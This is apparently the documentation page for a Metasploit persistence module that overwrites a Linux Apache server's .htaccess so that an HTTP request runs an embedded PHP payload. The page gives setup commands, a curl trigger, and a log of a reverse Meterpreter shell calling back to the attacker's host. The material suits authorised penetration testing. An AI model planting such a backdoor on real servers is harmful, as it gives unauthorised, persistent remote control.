documentation/modules/exploit/linux/persistence/apache_htaccess.md
This module targets Linux systems running an Apache web server with
per-directory .htaccess overrides enabled (AllowOverride All) and PHP
support enabled (mod_php). The module rewrites the target's .htaccess
file so that Apache treats it as a PHP script (SetHandler application/x-httpd-php) and embeds a payload inside a PHP block.
Requesting the .htaccess file over HTTP triggers execution of the
embedded payload. Inspired by the htshells project.
msfconsoleuse exploit/linux/persistence/apache_htaccessset SESSION <session_id>set HTACCESS_PATH /var/wwwset TARGET 0 for a PHP payload, or set TARGET 1 for a raw command payloadset PAYLOAD <payload matching the selected target>runcurl http://TARGET/.htaccesswww-data)Absolute path to the directory holding the .htaccess file to overwrite.
The module reads/writes <HTACCESS_PATH>/.htaccess. The directory must
have AllowOverride All enabled and be writable. (Default: /var/www/)
msf exploit(linux/persistence/apache_htaccess) > set session 1
ssession => 1
msf exploit(linux/persistence/apache_htaccess) > set htaccess_path /var/www/html
htaccess_path => /var/www/html
msf exploit(linux/persistence/apache_htaccess) > run verbose=true
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(linux/persistence/apache_htaccess) >
[*] Started reverse TCP handler on 192.168.3.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Apache is running and .htaccess is writable
[*] Backing up /var/www/html/.htaccess to loot...
[+] Backup saved to: /home/ms/.msf4/loot/20260703080243_default_10.5.134.171_htaccess.backup_313665.txt
[*] Writing payload to /var/www/html/.htaccess
[+] Payload written.
[*] Persistence is now available at .htaccess on target webserver
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/ubuntu2204x64_20260703.0243/ubuntu2204x64_20260703.0243.rc
After sending HTTP GET request to .htaccess:
msf exploit(linux/persistence/apache_htaccess) > [*] Sending stage (45755 bytes) to 10.5.134.171
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.134.171:41738) at 2026-07-03 08:03:07 +0200
msf exploit(linux/persistence/apache_htaccess) > sessions -1
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer : ubuntu2204x64
OS : Linux ubuntu2204x64 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
Architecture : x64
System Language : C
Meterpreter : php/linux